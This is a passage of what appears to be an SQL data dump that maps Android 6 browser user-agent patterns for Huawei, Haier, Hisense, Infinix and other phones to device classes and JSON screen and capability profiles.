AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CRR-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CRR-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI CRR-UL20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI G7-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI GRA-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI GRA-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI GRA-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI GRA-UL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI KII-L05) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI KII-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI KII-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI KII-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-L11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-L12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-L13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MLA-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MT7-J1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MT7-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MT7-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI MT7-UL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI NMO-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI NMO-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI NXT-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI NXT-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI P8max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":768,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI RIO-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI RIO-L01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI RIO-L02) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI RIO-L03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-DL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L52) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-L53) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI VNS-TL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HUAWEI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; HW-V8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier A42P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier A45) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier T50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier_AL40) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier_T53P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Haier_i50) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Halo X LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hammer AXE Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense F20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense F31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense L675) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense L830) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense T963) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense U601S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense U962) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense U963) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hisense U989) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Hyundai E500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; IDbot553) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; IDbot553PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; IM-100GN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; IRON_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium L420) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium L910) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium LT510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium X220) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium X510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ilium X710) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Impress Eagle) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Impress Moon) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Impress Tor) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Impression ImSmart C551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; InFocus M680) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; InFocus M808) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; InFocus M812A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix HOT 4 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix HOT 4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix HOT 4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix NOTE 3 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Infinix NOTE 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 